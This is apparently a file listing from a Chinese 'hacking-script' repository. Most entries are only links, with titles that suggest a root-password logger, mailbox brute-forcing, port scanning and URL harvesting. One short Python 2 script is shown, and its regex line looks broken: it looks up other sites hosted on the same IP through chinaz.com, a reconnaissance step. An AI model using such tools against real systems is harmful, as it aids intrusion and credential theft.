/用python自动拔号并取本地网卡的IP地址外网IP地址以及下一跳由的地址.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/用python自动拔号并取本地网卡的IP地址外网IP地址以及下一跳由的地址.py -------------------------------------------------------------------------------- /百度url采集.py: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/百度url采集.py -------------------------------------------------------------------------------- /端口扫描/使用.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/端口扫描/使用.txt -------------------------------------------------------------------------------- /简利同IP站查询:.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import urllib 4 | import sys 5 | import re 6 | try: 7 |         url = "http://s.tool.chinaz.com/same?s= " 8 |         zhan = sys.argv[1] 9 |         f = open(zhan + ".txt","w") 10 |         jieguo = urllib.urlopen(url + str(zhan)) 11 |         content = jieguo.read() 12 |         ree = r"\<\/span\> \"                     13 |         ss = re.findall(ree,content) 14 |         for x in ss: 15 |                 print>>f,x 16 |         print 'ok,look ' + zhan + '.txt.' 17 |         f.close() 18 | except: 19 |         print 'eg:python pz.py bbs.ichunqiu.com' 20 | -------------------------------------------------------------------------------- /记录root密码.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/记录root密码.py -------------------------------------------------------------------------------- /邮箱爆破.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/邮箱爆破.py --------------------------------------------------------------------------------